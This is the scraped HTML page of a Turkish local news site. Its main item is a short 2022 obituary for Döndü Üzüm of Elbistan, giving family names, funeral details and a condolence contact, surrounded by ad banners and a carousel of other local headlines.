<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/bellona-şubat-son.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/maden-isten-is-sagligi-guvenligi-icin-ozel-proje-h73201.html" title="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/03/madeniş-proje-2.jpg" alt="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje" />
      <div class="caption">Maden-İş’ten ‘İş Sağlığı Güvenliği’ için...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/devlet-hastanesinde-ilk-kez-el-bileginden-koroner-anjiyografi-yapildi-h73199.html" title="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/03/kalp_merkezinde_ilk_anjiyo_yapildi_h72058_c0fcf.jpg" alt="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı" />
      <div class="caption">Devlet hastanesinde ilk kez el...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/canakkale-ruhunu-hem-yasadilar-hem-yasattilar-h73197.html" title="Çanakkale ruhunu hem yaşadılar hem yaşattılar" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/03/canakkale-zaferi-1.jpg" alt="Çanakkale ruhunu hem yaşadılar hem yaşattılar" />
      <div class="caption">Çanakkale ruhunu hem yaşadılar hem...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/ekinozunde-18-tasinmaz-ihale-ile-satilacak-h73195.html" title="Ekinözü’nde 18 taşınmaz ihale ile satılacak" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/03/arsa.jpg" alt="Ekinözü’nde 18 taşınmaz ihale ile satılacak" />
      <div class="caption">Ekinözü’nde 18 taşınmaz ihale ile...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/denetimli-serbestlikten-2-ayri-etkinlik-h73194.html" title="Denetimli Serbestlik’ten 2 ayrı etkinlik" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/03/denetimli-serbestlik-program-2.jpg" alt="Denetimli Serbestlik’ten 2 ayrı etkinlik" />
      <div class="caption">Denetimli Serbestlik’ten 2 ayrı etkinlik</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/kentpark-ev-gerecleri-reklam.gif" width="980" height="201" style="width:980px;height: 201px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Döndü Üzüm 87 yaşında</h1>
                <h2 class="lead" itemprop="description"><strong></strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2022-03-19 12:20:16" content="2022-03-19T12:20:16+02:00">19 Mart 2022 Cumartesi 12:20</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" alt="Döndü Üzüm 87 yaşında" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-73200"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="line-height:107%"><strong class="klink">Döndü Üzüm 87 yaşında</strong></span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">İğde mahallesinden İbrahim ve Sultan kızı,   İğde mahallesinden Fransa'dan emekli Durdu Üzüm 'ün eşi  Nihat, Turgut, Zekeriya, Ahmet, Nevide, Mehmet kardeşlerin annesi Döndü Üzüm vefat etmiştir.  Cenazesi 20 Mart 2022 Pazar günü Karaelbistan mezarlığına defnedilecektir. Taziyesi Karaelbistan mahallesinde oğlu Nihat Üzüm evindedir.</span></span></p>

<p><span style="font-size:16px;"><span style="line-height:107%">Taziye telefonu:</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="line-height:107%">Nihat Üzüm (oğlu) 0542 541 15 46</span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/maden-isten-is-sagligi-guvenligi-icin-ozel-proje-h73201.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/devlet-hastanesinde-ilk-kez-el-bileginden-koroner-anjiyografi-yapildi-h73199.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/jasat-ve-jandarmadan-hirsizlik-sebekesine-darbe-h73198.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/canakkale-ruhunu-hem-yasadilar-hem-yasattilar-h73197.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/sehit-aileleri-ve-gazilere-devlet-ovunc-madalyalari-takdim-edildi-2-h73196.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ekinozunde-18-tasinmaz-ihale-ile-satilacak-h73195.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/denetimli-serbestlikten-2-ayri-etkinlik-h73194.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/mehmetcigin-canakkaledeki-bir-ogunu-kumanyalari-oldu-h73193.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/4-otomobil-carpisti-2-yarali-h73192.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ali-tekinsoy-ortaokulu-enerjisini-gunesten-alacak-h73190.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/siir-ve-kompozisyon-yarismasinda-oduller-sahiplerini-buldu-h73189.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/asirella-rada-sirki-elbistanda-h73188.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/pancar-alim-fiyati-guncellendi-h73187.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/gurbuz-ingiltereden-elbistana-yatirim-koprusu-kurmak-h73186.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hali-yikamacilar-derneginden-zorunlu-zam-aciklamasi-h73185.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-tirastan-a-termikte-ziyaret-h73184.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kaymakam-demir-kursiyerlerin-el-emegi-goz-nuru-urunlerini-inceledi-h73183.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-gurbuzden-berat-kandili-mesaji-2-h73182.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/daha-temiz-bir-kent-icin-muhtarlarla-isbirligi-h73181.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/muftu-kilinctan-berat-kandili-mesaji-3-h73180.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-1823-lira-idari-para-cezasi-h73179.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/nesli-tukenmekte-olan-hint-balikcil-kusu-yarali-halde-bulundu-h73178.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/emyo-ipekyolu-kariyer-fuarinda-yerini-aldi-h73177.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistan-saglik-hizmetleri-myodan-doktorlara-plaket-h73176.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/8-yasina-giren-cocuga-unutulmaz-bir-dogum-gunu-konsepti-hazirladilar-h73175.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/maden-isten-is-sagligi-guvenligi-icin-ozel-proje-h73201.html" title="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/maden_isten_is_sagligi_guvenligi_icin_ozel_proje_h73201_d3f44.JPG" alt="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/devlet-hastanesinde-ilk-kez-el-bileginden-koroner-anjiyografi-yapildi-h73199.html" title="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/devlet_hastanesinde_ilk_kez_el_bileginden_koroner_anjiyografi_yapildi_h73199_cbb41.jpg" alt="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/jasat-ve-jandarmadan-hirsizlik-sebekesine-darbe-h73198.html" title="JASAT ve jandarmadan hırsızlık şebekesine darbe">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/jasat_ve_jandarmadan_hirsizlik_sebekesine_darbe_h73198_6acf2.jpg" alt="JASAT ve jandarmadan hırsızlık şebekesine darbe" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">JASAT ve jandarmadan hırsızlık şebekesine darbe</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/canakkale-ruhunu-hem-yasadilar-hem-yasattilar-h73197.html" title="Çanakkale ruhunu hem yaşadılar hem yaşattılar">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/canakkale_ruhunu_hem_yasadilar_hem_yasattilar_h73197_90eab.JPG" alt="Çanakkale ruhunu hem yaşadılar hem yaşattılar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Çanakkale ruhunu hem yaşadılar hem yaşattılar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/sehit-aileleri-ve-gazilere-devlet-ovunc-madalyalari-takdim-edildi-2-h73196.html" title="Şehit Aileleri ve Gazilere Devlet Övünç Madalyaları Takdim Edildi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/sehit_aileleri_ve_gazilere_devlet_ovunc_madalyalari_takdim_edildi_h73196_bd7cd.jpg" alt="Şehit Aileleri ve Gazilere Devlet Övünç Madalyaları Takdim Edildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Şehit Aileleri ve Gazilere Devlet Övünç Madalyaları Takdim Edildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ekinozunde-18-tasinmaz-ihale-ile-satilacak-h73195.html" title="Ekinözü’nde 18 taşınmaz ihale ile satılacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/ekinozunde_18_tasinmaz_ihale_ile_satilacak_h73195_0c34c.jpg" alt="Ekinözü’nde 18 taşınmaz ihale ile satılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ekinözü’nde 18 taşınmaz ihale ile satılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/denetimli-serbestlikten-2-ayri-etkinlik-h73194.html" title="Denetimli Serbestlik’ten 2 ayrı etkinlik">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/denetimli_serbestlikten_2_ayri_etkinlik_h73194_06e12.jpg" alt="Denetimli Serbestlik’ten 2 ayrı etkinlik" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Denetimli Serbestlik’ten 2 ayrı etkinlik</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/mehmetcigin-canakkaledeki-bir-ogunu-kumanyalari-oldu-h73193.html" title="Mehmetçiğin Çanakkale’deki bir öğünü, kumanyaları oldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/mehmetcigin_canakkaledeki_bir_ogunu_kumanyalari_oldu_h73193_cab26.JPG" alt="Mehmetçiğin Çanakkale’deki bir öğünü, kumanyaları oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mehmetçiğin Çanakkale’deki bir öğünü, kumanyaları oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/4-otomobil-carpisti-2-yarali-h73192.html" title="4 otomobil çarpıştı: 2 yaralı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/4_otomobil_carpisti_2_yarali_h73192_5af30.JPG" alt="4 otomobil çarpıştı: 2 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">4 otomobil çarpıştı: 2 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ali-tekinsoy-ortaokulu-enerjisini-gunesten-alacak-h73190.html" title="Ali Tekinsoy Ortaokulu enerjisini güneşten alacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/ali_tekinsoy_ortaokulu_enerjisini_gunesten_alacak_h73190_1a212.JPG" alt="Ali Tekinsoy Ortaokulu enerjisini güneşten alacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ali Tekinsoy Ortaokulu enerjisini güneşten alacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/siir-ve-kompozisyon-yarismasinda-oduller-sahiplerini-buldu-h73189.html" title="Şiir ve kompozisyon yarışmasında ödüller sahiplerini buldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/siir_ve_kompozisyon_yarismasinda_oduller_sahiplerini_buldu_h73189_03cbc.JPG" alt="Şiir ve kompozisyon yarışmasında ödüller sahiplerini buldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Şiir ve kompozisyon yarışmasında ödüller sahiplerini buldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/asirella-rada-sirki-elbistanda-h73188.html" title="Asirella Rada Sirki Elbistan’da">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/asirella_rada_sirki_elbistanda_h73188_834eb.jpg" alt="Asirella Rada Sirki Elbistan’da" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Asirella Rada Sirki Elbistan’da</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/pancar-alim-fiyati-guncellendi-h73187.html" title="Pancar alım fiyatı güncellendi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/pancar_alim_fiyati_guncellendi_h73187_b5d9e.JPG" alt="Pancar alım fiyatı güncellendi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Pancar alım fiyatı güncellendi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/gurbuz-ingiltereden-elbistana-yatirim-koprusu-kurmak-h73186.html" title="Gürbüz: “İngiltere’den Elbistan’a yatırım köprüsü kurmak istiyoruz”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/gurbuz_ingiltereden_elbistana_yatirim_koprusu_kurmak_istiyoruz_h73186_55070.jpeg" alt="Gürbüz: “İngiltere’den Elbistan’a yatırım köprüsü kurmak istiyoruz”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Gürbüz: “İngiltere’den Elbistan’a yatırım köprüsü kurmak istiyoruz”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hali-yikamacilar-derneginden-zorunlu-zam-aciklamasi-h73185.html" title="Halı Yıkamacılar Derneği’nden ‘zorunlu zam’ açıklaması">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/hali_yikamacilar_derneginden_zorunlu_zam_aciklamasi_h73185_3c076.jpg" alt="Halı Yıkamacılar Derneği’nden ‘zorunlu zam’ açıklaması" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Halı Yıkamacılar Derneği’nden ‘zorunlu zam’ açıklaması</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-tirastan-a-termikte-ziyaret-h73184.html" title="Başkan Tıraş’tan A Termik’te ziyaret">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/baskan_tirastan_a_termikte_ziyaret_h73184_34ccf.jpg" alt="Başkan Tıraş’tan A Termik’te ziyaret" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Tıraş’tan A Termik’te ziyaret</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kaymakam-demir-kursiyerlerin-el-emegi-goz-nuru-urunlerini-inceledi-h73183.html" title="Kaymakam Demir, kursiyerlerin el emeği göz nuru ürünlerini inceledi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/kaymakam_demir_kursiyerlerin_el_emegi_goz_nuru_urunlerini_inceledi_h73183_f1675.jpg" alt="Kaymakam Demir, kursiyerlerin el emeği göz nuru ürünlerini inceledi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir, kursiyerlerin el emeği göz nuru ürünlerini inceledi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-gurbuzden-berat-kandili-mesaji-2-h73182.html" title="Başkan Gürbüz’den Berat Kandili mesajı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/baskan_gurbuzden_berat_kandili_mesaji_h73182_a2b71.jpg" alt="Başkan Gürbüz’den Berat Kandili mesajı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz’den Berat Kandili mesajı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/daha-temiz-bir-kent-icin-muhtarlarla-isbirligi-h73181.html" title="Daha temiz bir kent için muhtarlarla işbirliği">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/daha_temiz_bir_kent_icin_muhtarlarla_isbirligi_h73181_8905c.jpg" alt="Daha temiz bir kent için muhtarlarla işbirliği" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Daha temiz bir kent için muhtarlarla işbirliği</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/muftu-kilinctan-berat-kandili-mesaji-3-h73180.html" title="Müftü Kılınç’tan Berat Kandili mesajı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/muftu_kilinctan_berat_kandili_mesaji_h73180_188b2.jpg" alt="Müftü Kılınç’tan Berat Kandili mesajı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Müftü Kılınç’tan Berat Kandili mesajı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-1823-lira-idari-para-cezasi-h73179.html" title="Polis çakarı kullanan sürücüye 1823 lira idari para cezası">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/polis_cakari_kullanan_surucuye_1823_lira_idari_para_cezasi_h73179_02899.jpg" alt="Polis çakarı kullanan sürücüye 1823 lira idari para cezası" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Polis çakarı kullanan sürücüye 1823 lira idari para cezası</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/nesli-tukenmekte-olan-hint-balikcil-kusu-yarali-halde-bulundu-h73178.html" title="Nesli tükenmekte olan Hint balıkçıl kuşu yaralı halde bulundu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/nesli_tukenmekte_olan_hint_balikcil_kusu_yarali_halde_bulundu_h73178_d1c73.jpg" alt="Nesli tükenmekte olan Hint balıkçıl kuşu yaralı halde bulundu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Nesli tükenmekte olan Hint balıkçıl kuşu yaralı halde bulundu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/emyo-ipekyolu-kariyer-fuarinda-yerini-aldi-h73177.html" title="EMYO, İpekyolu Kariyer Fuarı’nda yerini aldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/emyo_ipekyolu_kariyer_fuarinda_yerini_aldi_h73177_e6862.jpg" alt="EMYO, İpekyolu Kariyer Fuarı’nda yerini aldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">EMYO, İpekyolu Kariyer Fuarı’nda yerini aldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-saglik-hizmetleri-myodan-doktorlara-plaket-h73176.html" title="Elbistan Sağlık Hizmetleri MYO’dan doktorlara plaket">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/elbistan_saglik_hizmetleri_myodan_doktorlara_plaket_h73176_2126f.jpg" alt="Elbistan Sağlık Hizmetleri MYO’dan doktorlara plaket" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Sağlık Hizmetleri MYO’dan doktorlara plaket</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/8-yasina-giren-cocuga-unutulmaz-bir-dogum-gunu-konsepti-hazirladilar-h73175.html" title="8 yaşına giren çocuğa unutulmaz bir doğum günü konsepti hazırladılar">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/03/8_yasina_giren_cocuga_unutulmaz_bir_dogum_gunu_konsepti_hazirladilar_h73175_05ab7.jpg" alt="8 yaşına giren çocuğa unutulmaz bir doğum günü konsepti hazırladılar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">8 yaşına giren çocuğa unutulmaz bir doğum günü konsepti hazırladılar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
